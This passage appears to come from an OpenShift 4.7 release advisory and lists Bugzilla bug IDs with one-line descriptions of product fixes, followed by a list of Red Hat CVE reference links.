1911443 - SSH Cretifiaction field should be validated
1911465 - IOPS display wrong unit
1911474 - Devfile Application Group Does Not Delete Cleanly (errors)
1911487 - Pruning Deployments should use ReplicaSets instead of ReplicationController
1911574 - Expose volume mode on Upload Data form
1911617 - [CNV][UI] Failure to add source to VM template when no default storage class is defined
1911632 - rpm-ostree command fail due to wrong options when updating ocp-4.6 to 4.7 on worker nodes with rt-kernel
1911656 - using 'operator-sdk run bundle' to install operator successfully, but the command output said 'Failed to run bundle''
1911664 - [Negative Test] After deleting metal3 pod, scaling worker stuck on provisioning state
1911782 - Descheduler should not evict pod used local storage by the PVC
1911796 - uploading flow being displayed before submitting the form
1912066 - The ansible type operator's manager container is not stable when managing the CR
1912077 - helm operator's default rbac forbidden
1912115 - [automation] Analyze job keep failing because of 'JavaScript heap out of memory'
1912237 - Rebase CSI sidecars for 4.7
1912381 - [e2e][automation] Miss css ID on Create Network Attachment Definition page
1912409 - Fix flow schema deployment
1912434 - Update guided tour modal title
1912522 - DNS Operator e2e test: TestCoreDNSImageUpgrade is fundamentally broken
1912523 - Standalone pod status not updating in topology graph
1912536 - Console Plugin CR for console-demo-plugin has wrong apiVersion
1912558 - TaskRun list and detail screen doesn't show Pending status
1912563 - p&f: carry 97206: clean up executing request on panic
1912565 - OLM macOS local build broken by moby/term dependency
1912567 - [OCP on RHV] Node becomes to 'NotReady' status when shutdown vm from RHV UI only on the second deletion
1912577 - 4.1/4.2->4.3->...-> 4.7 upgrade is stuck during 4.6->4.7 with co/openshift-apiserver Degraded, co/network not Available and several other components pods CrashLoopBackOff
1912590 - publicImageRepository not being populated
1912640 - Go operator's controller pods is forbidden
1912701 - Handle dual-stack configuration for NIC IP
1912703 - multiple queries can't be plotted in the same graph under some conditons
1912730 - Operator backed: In-context should support visual connector if SBO is not installed
1912828 - Align High Performance VMs with High Performance in RHV-UI
1912849 - VM from wizard - default flavor does not match the actual flavor set by common templates
1912852 - VM from wizard - available VM templates - "storage" field is "0 B"
1912888 - recycler template should be moved to KCM operator
1912907 - Helm chart repository index can contain unresolvable relative URL's
1912916 - Set external traffic policy to cluster for IBM platform
1912922 - Explicitly specifying the operator generated default certificate for an ingress controller breaks the ingress controller
1912938 - Update confirmation modal for quick starts
1912942 - cluster-storage-operator: proxy ENV is not injected into vsphere-problem-detector deployment
1912944 - cluster-storage-operator: proxy ENV is not injected into Manila CSI driver operator deployment
1912945 - aws-ebs-csi-driver-operator: proxy ENV is not injected into the CSI driver
1912946 - gcp-pd-csi-driver-operator: proxy ENV is not injected into the CSI driver
1912947 - openstack-cinder-csi-driver-operator: proxy ENV is not injected into the CSI driver
1912948 - csi-driver-manila-operator: proxy ENV is not injected into the CSI driver
1912949 - ovirt-csi-driver-operator: proxy ENV is not injected into the CSI driver
1912977 - rebase upstream static-provisioner
1913006 - Remove etcd v2 specific alerts with etcd_http* metrics
1913011 - [OVN] Pod's external traffic not use egressrouter macvlan ip as a source ip
1913037 - update static-provisioner base image
1913047 - baremetal clusteroperator progressing status toggles between true and false when cluster is in a steady state
1913085 - Regression OLM uses scoped client for CRD installation
1913096 - backport: cadvisor machine metrics are missing in k8s 1.19
1913132 - The installation of Openshift Virtualization reports success early before it 's succeeded eventually
1913154 - Upgrading to 4.6.10 nightly failed with RHEL worker nodes: Failed to find /dev/disk/by-label/root
1913196 - Guided Tour doesn't handle resizing of browser
1913209 - Support modal should be shown for community supported templates
1913226 - [Migration] The SDN migration rollback failed if customize vxlanPort
1913249 - update info alert this template is not aditable
1913285 - VM list empty state should link to virtualization quick starts
1913289 - Rebase AWS EBS CSI driver for 4.7
1913292 - OCS 4.7 Installation failed over vmware when arbiter was enabled, as flexibleScaling is also getting enabled
1913297 - Remove restriction of taints for arbiter node
1913306 - unnecessary scroll bar is present on quick starts panel
1913325 - 1.20 rebase for openshift-apiserver
1913331 - Import from git: Fails to detect Java builder
1913332 - Pipeline visualization breaks the UI when multiple taskspecs are used
1913343 - (release-4.7) Added changelog file for insights-operator
1913356 - (release-4.7) Implemented gathering specific logs from openshift apiserver operator
1913371 - Missing i18n key "Administrator" in namespace "console-app" and language "en."
1913386 - users can see metrics of namespaces for which they don't have rights when monitoring own services with prometheus user workloads
1913420 - Time duration setting of resources is not being displayed
1913536 - 4.6.9 -> 4.7 upgrade hangs. RHEL 7.9 worker stuck on "error enabling unit: Failed to execute operation: File exists\\n\"
1913554 - Recording rule for ingress error fraction SLI is incorrect, uses irate instead of increase
1913560 - Normal user cannot load template on the new wizard
1913563 - "Virtual Machine" is not on the same line in create button when logged with normal user
1913567 - Tooltip data should be same for line chart or stacked chart, display data value same as the table
1913568 - Normal user cannot create template
1913582 - [Migration]SDN to OVN migration stucks on MCO for rhel worker
1913585 - Topology descriptive text fixes
1913608 - Table data contains data value None after change time range in graph and change back
1913651 - Improved Red Hat image and crashlooping OpenShift pod collection
1913660 - Change location and text of Pipeline edit flow alert
1913685 - OS field not disabled when creating a VM from a template
1913716 - Include additional use of existing libraries
1913725 - Refactor Insights Operator Plugin states
1913736 - Regression: fails to deploy computes when using root volumes
1913747 - Update operator to kubernetes 1.20.1 to pickup upstream fixes
1913751 - add third-party network plugin test suite to openshift-tests
1913783 - QE-To fix the merging pr issue, commenting the afterEach() block
1913807 - Template support badge should not be shown for community supported templates
1913821 - Need definitive steps about uninstalling descheduler operator
1913851 - Cluster Tasks are not sorted in pipeline builder
1913864 - BuildConfig YAML template references ruby ImageStreamTag that no longer exists
1913951 - Update the Devfile Sample Repo to an Official Repo Host
1913960 - Cluster Autoscaler should use 1.20 dependencies
1913969 - Field dependency descriptor can sometimes cause an exception
1914060 - Disk created from 'Import via Registry' cannot be used as boot disk
1914066 - [sriov] sriov dp pod crash when delete ovs HW offload policy
1914090 - Grafana - The resulting dataset is too large to graph (OCS RBD volumes being counted as disks)
1914119 - vsphere problem detector operator has no permission to update storages.operator.openshift.io instances
1914125 - Still using /dev/vde as default device path when create localvolume
1914183 - Empty NAD page is missing link to quickstarts
1914196 - target port in `from dockerfile` flow does nothing
1914204 - Creating VM from dev perspective may fail with template not found error
1914209 - Associate image secret name to pipeline serviceaccount imagePullSecrets
1914212 - [e2e][automation] Add test to validate bootable disk souce
1914250 - ovnkube-node fails on master nodes when both DHCPv6 and SLAAC addresses are configured on nodes
1914284 - Upgrade to OCP 4.6.9 results in cluster-wide DNS and connectivity issues due to bad NetworkPolicy flows
1914287 - Bring back selfLink
1914301 - User VM Template source should show the same provider as template itself
1914303 - linuxptp-daemon is not forwarding ptp4l stderr output to openshift logs
1914309 - /terminal page when WTO not installed shows nonsensical error
1914334 - order of getting started samples is arbitrary
1914343 - [sig-imageregistry][Feature:ImageTriggers] Annotation trigger reconciles after the image is overwritten [Suite:openshift/conformance/parallel] timeout on s390x
1914349 - Increase and decrease buttons in max and min pods in HPA page has distorted UI
1914405 - Quick search modal should be opened when coming back from a selection
1914407 - Its not clear that node-ca is running as non-root
1914427 - Count of pods on the dashboard is incorrect
1914439 - Typo in SRIOV port create command example
1914451 - cluster-storage-operator pod running as root
1914452 - oc image append, oc image extract outputs wrong suggestion to use --keep-manifest-list=true
1914642 - Customize Wizard Storage tab does not pass validation
1914723 - SamplesTBRInaccessibleOnBoot Alert has a misspelling
1914793 - device names should not be translated
1914894 - Warn about using non-groupified api version
1914926 - webdriver-manager pulls incorrect version of ChomeDriver due to a bug
1914932 - Put correct resource name in relatedObjects
1914938 - PVC disk is not shown on customization wizard general tab
1914941 - VM Template rootdisk is not deleted after fetching default disk bus
1914975 - Collect logs from openshift-sdn namespace
1915003 - No estimate of average node readiness during lifetime of a cluster
1915027 - fix MCS blocking iptables rules
1915041 - s3:ListMultipartUploadParts is relied on implicitly
1915079 - Canary controller should not periodically rotate the canary route endpoint for performance reasons
1915080 - Large number of tcp connections with shiftstack ocp cluster in about 24 hours
1915085 - Pods created and rapidly terminated get stuck
1915114 - [aws-c2s] worker machines are not create during install
1915133 - Missing default pinned nav items in dev perspective
1915176 - Update snapshot API CRDs to v1 in web-console when creating volumesnapshot related resource
1915187 - Remove the "Tech preview" tag in web-console for volumesnapshot
1915188 - Remove HostSubnet anonymization
1915200 - [OCP 4.7+ OCS 4.6]Arbiter related Note should not show up during UI deployment
1915217 - OKD payloads expect to be signed with production keys
1915220 - Remove dropdown workaround for user settings
1915235 - Failed to upgrade to 4.7 from 4.6 due to the machine-config failure
1915262 - When deploying with assisted install the CBO operator is installed and enabled without metal3 pod
1915277 - [e2e][automation]fix cdi upload form test
1915295 - [BM][IP][Dualstack] Installation failed - operators report dial tcp 172.30.0.1:443: i/o timeout
1915304 - Updating scheduling component builder & base images to be consistent with ART
1915312 - Prevent schedule Linux openshift-network-diagnostics pod on Windows node
1915318 - [Metal] bareMetal IPI - cannot interact with toolbox container after first execution only in parallel from different connection
1915348 - [RFE] linuxptp operator needs to expose the uds_address_socket to be used by an application pod
1915357 - Dev Catalog doesn't load anything if virtualization operator is installed
1915379 - New template wizard should require provider and make support input a dropdown type
1915408 - Failure in operator-registry kind e2e test
1915416 - [Descheduler] descheduler evicts pod which does not have any ownerRef or descheduler evict annotation
1915460 - Cluster name size might affect installations
1915500 - [aws c2s] kube-controller-manager crash loops trying to fetch the AWS instance
1915540 - Silent 4.7 RHCOS install failure on ppc64le
1915579 - [Metal] redhat-support-tool became unavailable after tcpdump usage (BareMetal IPI)
1915582 - p&f: carry upstream pr 97860
1915594 - [e2e][automation] Improve test for disk validation
1915617 - Bump bootimage for various fixes
1915624 - "Please fill in the following field: Template provider" blocks customize wizard
1915627 - Translate Guided Tour text.
1915643 - OCP4.6 to 4.7 upgrade failed due to manila csi driver operator sync error
1915647 - Intermittent White screen when the connector dragged to revision
1915649 - "Template support" pop up is not a warning; checkbox text should be rephrased
1915654 - [e2e][automation] Add a verification for Afinity modal should hint "Matching node found"
1915661 - Can't run the 'oc adm prune' command in a pod
1915672 - Kuryr doesn't work with selfLink disabled.
1915674 - Golden image PVC creation - storage size should be taken from the template
1915685 - Message for not supported template is not clear enough
1915760 - Need to increase timeout to wait rhel worker get ready
1915793 - quick starts panel syncs incorrectly across browser windows
1915798 - oauth connection errors for openshift console pods on an OVNKube OCP 4.7 cluster
1915818 - vsphere-problem-detector: use "_totals" in metrics
1915828 - Latest Dell firmware (04.40.00.00) fails to install IPI on BM using idrac-virtualmedia protocol
1915859 - vsphere-problem-detector: does not report ESXi host version nor VM HW version
1915871 - operator-sdk version in new downstream image should be v1.2.0-ocp not v4.7.0
1915879 - Pipeline Dashboard tab Rename to Pipeline Metrics
1915885 - Kuryr doesn't support workers running on multiple subnets
1915898 - TaskRun log output shows "undefined" in streaming
1915907 - test/cmd/builds.sh uses docker.io
1915912 - sig-storage-csi-snapshotter image not available
1915926 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder & base images to be consistent with ART
1915929 - A11y Violation: svg-img-alt for time axis of Utilization Card on Cluster Dashboard
1915939 - Resizing the browser window removes Web Terminal Icon
1915945 - [sig-scheduling] SchedulerPreemption [Serial] validates basic preemption works [Conformance]
1915959 - Baremetal cluster operator is included in a ROKS installation of 4.7
1915962 - ROKS: manifest with machine health check fails to apply in 4.7
1915972 - Global configuration breadcrumbs do not work as expected
1915981 - Install ethtool and conntrack in container for debugging
1915995 - "Edit RoleBinding Subject" action under RoleBinding list page kebab actions causes unhandled exception
1915998 - Installer bootstrap node setting of additional subnets inconsistent with additional security groups
1916021 - OLM enters infinite loop if Pending CSV replaces itself
1916056 - Need Visual Web Terminal metric enabled for OCP monitoring telemetry
1916081 - non-existant should be non-existent in CloudCredentialOperatorTargetNamespaceMissing alert's annotations
1916099 - VM creation - customization wizard - user should be allowed to delete and re-create root disk
1916126 - [e2e][automation] Help fix tests for vm guest-agent and next-run-configuration
1916145 - Explicitly set minimum versions of python libraries
1916164 - Update csi-driver-nfs builder & base images to be consistent with ART
1916221 - csi-snapshot-controller-operator: bump dependencies for 4.7
1916271 - Known issues should mention failure to apply soft-anti-affinity to masters beyond the third
1916363 - [OVN] ovs-configuration.service reports as failed within all nodes using version 4.7.0-fc.2
1916379 - error metrics from vsphere-problem-detector should be gauge
1916382 - Can't create ext4 filesystems with Ignition
1916384 - 4.5.15 and later cluster-version operator does not sync ClusterVersion status before exiting, leaving 'verified: false' even for verified updates
1916401 - Deleting an ingress controller with a bad DNS Record hangs
1916417 - [Kuryr] Must-gather does not have all Custom Resources information
1916419 - [sig-devex][Feature:ImageEcosystem][Slow] openshift images should be SCL enabled returning s2i usage when running the image
1916454 - teach CCO about upgradeability from 4.6 to 4.7
1916486 - [OCP RHV] [Docs] Update RHV CSI provisioning section in OCP documenation
1916502 - Boot disk mirroring fails with mdadm error
1916524 - Two rootdisk shows on storage step
1916580 - Default yaml is broken for VM and VM template
1916621 - oc adm node-logs examples are wrong
1916642 - [zh_CN] Redundant period in Secrets - Create drop down menu - Key value secret.
1916692 - Possibly fails to destroy LB and thus cluster
1916711 - Update Kube dependencies in MCO to 1.20.0
1916747 - remove links to quick starts if virtualization operator isn't updated to 2.6
1916764 - editing a workload with no application applied, will auto fill the app
1916834 - Pipeline Metrics - Text Updates
1916843 - collect logs from openshift-sdn-controller pod
1916853 - cluster will not gracefully recover if openshift-etcd namespace is removed
1916882 - OCS 4.7 LSO : wizard (Discover disks and create storageclass) does not show zone when topology.kubernetes.io/zone are added manually
1916888 - OCS wizard Donor chart does not get updated when `Device Type` is edited
1916938 - Using 4.6 install-config.yaml file with lbFloatingIP results in validation error "Forbidden: cannot specify lbFloatingIP and apiFloatingIP together"
1916949 - ROKS: manifests in openshift-oauth-apiserver ns fails to create with non-existent namespace
1917101 - [UPI on oVirt] - 'RHCOS image' topic isn't located in the right place in UPI document
1917114 - Upgrade from 4.5.9 to 4.7 fails as authentication operator is Degraded due to '"ProxyConfigController" controller failed to sync "key"' error
1917117 - Common templates - disks screen: invalid disk name
1917124 - Custom template - clone existing PVC - the name of the target VM's data volume is hard-coded; only one VM can be created
1917146 - [oVirt] Consume 23-10 ovirt sdk- csi operator
1917147 - [oVirt] csi operator panics if ovirt-engine suddenly becomes unavailable.
1917148 - [oVirt] Consume 23-10 ovirt sdk
1917239 - Monitoring time options overlaps monitoring tab navigation when Quickstart panel is opened
1917272 - Should update the default minSize to 1Gi when create localvolumeset on web console
1917303 - [automation][e2e] make kubevirt-plugin gating job mandatory
1917315 - localvolumeset-local-provisoner-xxx pods are not killed after upgrading from 4.6 to 4.7
1917327 - annotations.message maybe wrong for NTOPodsNotReady alert
1917367 - Refactor periodic.go
1917371 - Add docs on how to use the built-in profiler
1917372 - Application metrics are shown on Metrics dashboard but not in linked Prometheus UI in OCP management console
1917395 - pv-pool backing store name restriction should be at 43 characters from the ocs ui
1917484 - [BM][IPI] Failed to scale down machineset
1917522 - Deprecate --filter-by-os in oc adm catalog mirror
1917537 - controllers continuously busy reconciling operator
1917551 - use min_over_time for vsphere prometheus alerts
1917585 - OLM Operator install page missing i18n
1917587 - Manila CSI operator becomes degraded if user doesn't have permissions to list share types
1917605 - Deleting an exgw causes pods to no longer route to other exgws
1917614 - [aws c2s] ingress operator uses unavailable resourcegrouptaggings API
1917656 - Add to Project/application for eventSources from topology shows 404
1917658 - Show TP badge for sources powered by camel connectors in create flow
1917660 - Editing parallelism of job get error info
1917678 - Could not provision pv when no symlink and target found on rhel worker
1917679 - Hide double CTA in admin pipelineruns tab
1917683 - `NodeTextFileCollectorScrapeError` alert in OCP 4.6 cluster.
1917759 - Console operator panics after setting plugin that does not exists to the console-operator config
1917765 - ansible-operator version in downstream image should be v1.3.0 not v4.7.0
1917770 - helm-operator version in downstream image should be v1.3.0 not v4.7.0
1917799 - Gather s list of names and versions of installed OLM operators
1917803 - [sig-storage] Pod Disks should be able to delete a non-existent PD without error
1917814 - Show Broker create option in eventing under admin perspective
1917838 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types
1917872 - [oVirt] rebase on latest SDK 2021-01-12
1917911 - network-tools needs ovnkube-trace binary from ovn-kubernetes image
1917938 - upgrade version of dnsmasq package
1917942 - Canary controller causes panic in ingress-operator
1918019 - Undesired scrollbars in markdown area of QuickStart
1918068 - Flaky olm integration tests
1918085 - reversed name of job and namespace in cvo log
1918112 - Flavor is not editable if a customize VM is created from cli
1918129 - Update IO sample archive with missing resources & remove IP anonymization from clusteroperator resources
1918132 - i18n: Volume Snapshot Contents menu is not translated
1918133 - [e2e][automation] Fix ocp 4.7 existing tests - part2
1918140 - Deployment openstack-cinder-csi-driver-controller and openstack-manila-csi-controllerplugin doesn't be installed on OSP
1918153 - When `&` character is set as an environment variable in a build config it is getting converted as `\u0026`
1918185 - Capitalization on PLR details page
1918287 - [ovirt] ovirt csi driver is flooding RHV with API calls and spam the event UI with new connections
1918318 - Kamelet connector's are not shown in eventing section under Admin perspective
1918351 - Gather SAP configuration (SCC & ClusterRoleBinding)
1918375 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews
1918395 - [ovirt] increase livenessProbe period
1918415 - MCD nil pointer on dropins
1918438 - [ja_JP, zh_CN] Serverless i18n misses
1918440 - Kernel Arguments get reapplied even when no new kargs has been added in MachineConfig
1918471 - CustomNoUpgrade Feature gates are not working correctly
1918558 - Supermicro nodes boot to PXE upon reboot after successful deployment to disk
1918622 - Updating ose-jenkins-agent-maven builder & base images to be consistent with ART
1918623 - Updating ose-jenkins-agent-nodejs-12 builder & base images to be consistent with ART
1918625 - Updating ose-jenkins-agent-nodejs-10 builder & base images to be consistent with ART
1918635 - Updating openshift-jenkins-2 builder & base images to be consistent with ART #1197
1918639 - Event listener with triggerRef crashes the console
1918648 - Subscription page doesn't show InstallPlan correctly
1918716 - Manilacsi becomes degraded even though it is not available with the underlying Openstack
1918748 - helmchartrepo is not http(s)_proxy-aware
1918757 - Consistant fallures of features/project-creation.feature Cypress test in CI
1918803 - Need dedicated details page w/ global config breadcrumbs for 'KnativeServing' plugin
1918826 - Insights popover icons are not horizontally aligned
1918879 - need better debug for bad pull secrets
1918958 - The default NMstate instance from the operator is incorrect
1919097 - Close bracket ")" missing at the end of the sentence in the UI
1919231 - quick search modal cut off on smaller screens
1919259 - Make "Add x" singular in Pipeline Builder
1919260 - VM Template list actions should not wrap
1919271 - NM prepender script doesn't support systemd-resolved
1919341 - Updating ose-jenkins-agent-maven builder & base images to be consistent with ART
1919360 - Need managed-cluster-info metric enabled for OCP monitoring telemetry
1919379 - dotnet logo out of date
1919387 - Console login fails with no error when it can't write to localStorage
1919396 - A11y Violation: svg-img-alt on Pod Status ring
1919407 - OpenStack IPI has three-node control plane limitation, but InstallConfigs aren't verified
1919750 - Search InstallPlans got Minified React error
1919778 - Upgrade is stuck in insights operator Degraded with "Source clusterconfig could not be retrieved" until insights operator pod is manually deleted
1919823 - OCP 4.7 Internationalization Chinese tranlate issue
1919851 - Visualization does not render when Pipeline & Task share same name
1919862 - The tip information for `oc new-project --skip-config-write` is wrong
1919876 - VM created via customize wizard cannot inherit template's PVC attributes
1919877 - Click on KSVC breaks with white screen
1919879 - The toolbox container name is changed from 'toolbox-root' to 'toolbox-' in a chroot environment
1919945 - user entered name value overridden by default value when selecting a git repository
1919968 - [release-4.7] Undiagnosed panic detected in pod runtime.go:76: invalid memory address or nil pointer dereference
1919970 - NTO does not update when the tuned profile is updated.
1919999 - Bump Cluster Resource Operator Golang Versions
1920027 - machine-config-operator consistently failing during 4.6 to 4.7 upgrades and clusters do not install successfully with proxy configuration
1920200 - user-settings network error results in infinite loop of requests
1920205 - operator-registry e2e tests not working properly
1920214 - Bump golang to 1.15 in cluster-resource-override-admission
1920248 - re-running the pipelinerun with pipelinespec crashes the UI
1920320 - VM template field is "Not available" if it's created from common template
1920367 - When creating localvolumeset instance from the web console, the title for setting volumeMode is `Disk Mode`
1920368 - Fix containers creation issue resulting in runc running on Guaranteed Pod CPUs
1920390 - Monitoring > Metrics graph shifts to the left when clicking the "Stacked" option and when toggling data series lines on / off
1920426 - Egress Router CNI OWNERS file should have ovn-k team members
1920427 - Need to update `oc login` help page since we don't support prompt interactively for the username
1920430 - [V2V] [UI] Browser window becomes empty when running import wizard for the first time
1920438 - openshift-tuned panics on turning debugging on/off.
1920445 - e2e-gcp-ovn-upgrade job is actually using openshift-sdn
1920481 - kuryr-cni pods using unreasonable amount of CPU
1920509 - wait for port 6443 to be open in the kube-scheduler container; use ss instead of lsof
1920524 - Topology graph crashes adding Open Data Hub operator
1920526 - catalog operator causing CPU spikes and bad etcd performance
1920551 - Boot Order is not editable for Templates in "openshift" namespace
1920555 - bump cluster-resource-override-admission api dependencies
1920571 - fcp multipath will not recover failed paths automatically
1920619 - Remove default scheduler profile value
1920655 - Console should not show the Create Autoscaler link in cluster settings when the CRD is not present
1920674 - MissingKey errors in bindings namespace
1920684 - Text in language preferences modal is misleading
1920695 - CI is broken because of bad image registry reference in the Makefile
1920756 - update generic-admission-server library to get the system:masters authorization optimization
1920769 - [Upgrade] OCP upgrade from 4.6.13 to 4.7.0-fc.4 for "network-check-target" failed when "defaultNodeSelector" is set
1920771 - i18n: Delete persistent volume claim drop down is not translated
1920806 - [OVN]Nodes lost network connection after reboot on the vSphere UPI
1920912 - Unable to power off BMH from console
1920981 - When OCS was deployed with arbiter mode enable add capacity is increasing the count by "2"
1920984 - [e2e][automation] some menu items names are out dated
1921013 - Gather PersistentVolume definition (if any) used in image registry config
1921023 - Do not enable Flexible Scaling to true for Internal mode clusters(revert to 4.6 behavior)
1921087 - 'start next quick start' link doesn't work and is unintuitive
1921088 - test-cmd is failing on volumes.sh pretty consistently
1921248 - Clarify the kubelet configuration cr description
1921253 - Text filter default placeholder text not internationalized
1921258 - User Preferences: Active perspective and project change in the current window when selected in a different window
1921275 - Panic in authentication-operator in (*deploymentController).updateOperatorDeploymentInfo
1921277 - Fix Warning and Info log statements to handle arguments
1921281 - oc get -o yaml --export returns "error: unknown flag: --export"
1921458 - [SDK] Gracefully handle the `run bundle-upgrade` if the lower version operator doesn't exist
1921556 - [OCS with Vault]: OCS pods didn't comeup after deploying with Vault details from UI
1921572 - For external source (i.e GitHub Source) form view as well shows yaml
1921580 - [e2e][automation]Test VM detail view actions dropdown does not pass
1921610 - Pipeline metrics font size inconsistency
1921644 - [e2e][automation] tests errors with wrong cloudInit new line syntax
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1921655 - [OSP] Incorrect error handling during cloudinfo generation
1921713 - [e2e][automation] fix failing VM migration tests
1921762 - Serving and Eventing breadcrumbs should direct users back to tabbed page view
1921774 - delete application modal errors when a resource cannot be found
1921806 - Explore page APIResourceLinks aren't i18ned
1921823 - CheckBoxControls not internationalized
1921836 - AccessTableRows don't internationalize "User" or "Group"
1921857 - Test flake when hitting router in e2e tests due to one router not being up to date
1921880 - Dynamic plugins are not initialized on console load in production mode
1921911 - Installer PR #4589 is causing leak of IAM role policy bindings
1921921 - "Global Configuration" breadcrumb does not use sentence case
1921949 - Console bug - source code URL broken for gitlab self-hosted repositories
1921954 - Subscription-related constraints in ResolutionFailed events are misleading
1922015 - buttons in modal header are invisible on Safari
1922021 - Nodes terminal page 'Expand' 'Collapse' button not translated
1922050 - [e2e][automation] Improve vm clone tests
1922066 - Cannot create VM from custom template which has extra disk
1922098 - Namespace selection dialog is not closed after select a namespace
1922099 - Updated Readme documentation for QE code review and setup
1922146 - Egress Router CNI doesn't have logging support.
1922267 - Collect specific ADFS error
1922292 - Bump RHCOS boot images for 4.7
1922454 - CRI-O doesn't enable pprof by default
1922473 - reconcile LSO images for 4.8
1922573 - oc returns an error while using -o jsonpath when there is no resource found in the namespace
1922782 - Source registry missing docker:// in yaml
1922907 - Interop UI Tests - step implementation for updating feature files
1922911 - Page crash when click the "Stacked" checkbox after clicking the data series toggle buttons
1922991 - "verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build" test fails on OKD
1923003 - WebConsole Insights widget showing "Issues pending" when the cluster doesn't report anything
1923098 - [vsphere-problem-detector-operator] Need permission to access replicasets.apps resources
1923102 - [vsphere-problem-detector-operator] pod's version is not correct
1923245 - [Assisted-4.7] [Staging][Minimal-ISO] nodes fails to boot
1923674 - k8s 1.20 vendor dependencies
1923721 - PipelineRun running status icon is not rotating
1923753 - Increase initialDelaySeconds for ovs-daemons container in the ovs-node daemonset for upgrade scenarios
1923774 - Docker builds failing for openshift/cluster-resource-override-admission-operator
1923802 - ci/prow/e2e-aws-olm build failing for openshift/cluster-resource-override-admission-operator
1923874 - Unable to specify values with % in kubeletconfig
1923888 - Fixes error metadata gathering
1923892 - Update arch.md after refactor.
1923894 - "installed" operator status in operatorhub page does not reflect the real status of operator
1923895 - Changelog generation.
1923911 - [e2e][automation] Improve tests for vm details page and list filter
1923945 - PVC Name and Namespace resets when user changes os/flavor/workload
1923951 - EventSources shows `undefined` in project
1923973 - Dynamic plugin demo README does not contain info how to enable the ConsolePlugins
1924046 - Localhost: Refreshing on a Project removes it from nav item urls
1924078 - Topology quick search View all results footer should be sticky.
1924081 - NTO should ship the latest Tuned daemon release 2.15
1924084 - backend tests incorrectly hard-code artifacts dir
1924128 - [sig-builds][Feature:Builds] verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build
1924135 - Under sufficient load, CRI-O may segfault
1924143 - Code Editor Decorator url is broken for Bitbucket repos
1924188 - Language selector dropdown doesn't always pre-select the language
1924365 - Add extra disk for VM which use boot source PXE
1924383 - Degraded network operator during upgrade to 4.7.z
1924387 - [ja_JP][zh_CN] Incorrect warning message for deleting namespace on Delete Pod dialog box.
1924480 - non cluster admin can not take VM snapshot: An error occurred, cannot set blockOwnerDeletion if an ownerReference refers to a resource you can't set finalizers on
1924583 - Deprectaed templates are listed in the Templates screen
1924870 - pick upstream pr#96901: plumb context with request deadline
1924955 - Images from Private external registry not working in deploy Image
1924961 - k8sutil.TrimDNS1123Label creates invalid values
1924985 - Build egress-router-cni for both RHEL 7 and 8
1925020 - Console demo plugin deployment image shoult not point to dockerhub
1925024 - Remove extra validations on kafka source form view net section
1925039 - [e2e] Fix Test - ID(CNV-5327) Change Custom Flavor while VM is running
1925072 - NTO needs to ship the current latest stalld v1.7.0
1925163 - Missing info about dev catalog in boot source template column
1925200 - Monitoring Alert icon is missing on the workload in Topology view
1925262 - apiserver getting 2 SIGTERM signals which was immediately making it exit code 1
1925319 - bash syntax error in configure-ovs.sh script
1925408 - Remove StatefulSet gatherer and replace it with gathering corresponding config map data
1925516 - Pipeline Metrics Tooltips are overlapping data
1925562 - Add new ArgoCD link from GitOps application environments page
1925596 - Gitops details page image and commit id text overflows past card boundary
1926556 - 'excessive etcd leader changes' test case failing in serial job because prometheus data is wiped by machine set test
1926588 - The tarball of operator-sdk is not ready for ocp4.7
1927456 - 4.7 still points to 4.6 catalog images
1927500 - API server exits non-zero on 2 SIGTERM signals
1929278 - Monitoring workloads using too high a priorityclass
1929645 - Remove openshift:kubevirt-machine-controllers decleration from machine-api
1929920 - Cluster monitoring documentation link is broken - 404 not found
5. References:
https://access.redhat.com/security/cve/CVE-2018-10103
https://access.redhat.com/security/cve/CVE-2018-10105
https://access.redhat.com/security/cve/CVE-2018-14461
https://access.redhat.com/security/cve/CVE-2018-14462
https://access.redhat.com/security/cve/CVE-2018-14463
https://access.redhat.com/security/cve/CVE-2018-14464
https://access.redhat.com/security/cve/CVE-2018-14465
https://access.redhat.com/security/cve/CVE-2018-14466
https://access.redhat.com/security/cve/CVE-2018-14467
https://access.redhat.com/security/cve/CVE-2018-14468
https://access.redhat.com/security/cve/CVE-2018-14469
https://access.redhat.com/security/cve/CVE-2018-14470
https://access.redhat.com/security/cve/CVE-2018-14553
https://access.redhat.com/security/cve/CVE-2018-14879
https://access.redhat.com/security/cve/CVE-2018-14880
https://access.redhat.com/security/cve/CVE-2018-14881
https://access.redhat.com/security/cve/CVE-2018-14882
https://access.redhat.com/security/cve/CVE-2018-16227
https://access.redhat.com/security/cve/CVE-2018-16228
https://access.redhat.com/security/cve/CVE-2018-16229
https://access.redhat.com/security/cve/CVE-2018-16230
https://access.redhat.com/security/cve/CVE-2018-16300
https://access.redhat.com/security/cve/CVE-2018-16451
https://access.redhat.com/security/cve/CVE-2018-16452
https://access.redhat.com/security/cve/CVE-2018-20843
https://access.redhat.com/security/cve/CVE-2019-3884
https://access.redhat.com/security/cve/CVE-2019-5018
https://access.redhat.com/security/cve/CVE-2019-6977
https://access.redhat.com/security/cve/CVE-2019-6978
https://access.redhat.com/security/cve/CVE-2019-8625
https://access.redhat.com/security/cve/CVE-2019-8710
https://access.redhat.com/security/cve/CVE-2019-8720
https://access.redhat.com/security/cve/CVE-2019-8743
https://access.redhat.com/security/cve/CVE-2019-8764
https://access.redhat.com/security/cve/CVE-2019-8766
https://access.redhat.com/security/cve/CVE-2019-8769
https://access.redhat.com/security/cve/CVE-2019-8771
https://access.redhat.com/security/cve/CVE-2019-8782
https://access.redhat.com/security/cve/CVE-2019-8783
https://access.redhat.com/security/cve/CVE-2019-8808
https://access.redhat.com/security/cve/CVE-2019-8811
https://access.redhat.com/security/cve/CVE-2019-8812
https://access.redhat.com/security/cve/CVE-2019-8813
https://access.redhat.com/security/cve/CVE-2019-8814
https://access.redhat.com/security/cve/CVE-2019-8815
https://access.redhat.com/security/cve/CVE-2019-8816
https://access.redhat.com/security/cve/CVE-2019-8819
https://access.redhat.com/security/cve/CVE-2019-8820
https://access.redhat.com/security/cve/CVE-2019-8823
https://access.redhat.com/security/cve/CVE-2019-8835
https://access.redhat.com/security/cve/CVE-2019-8844
https://access.redhat.com/security/cve/CVE-2019-8846
https://access.redhat.com/security/cve/CVE-2019-9455
https://access.redhat.com/security/cve/CVE-2019-9458
https://access.redhat.com/security/cve/CVE-2019-11068
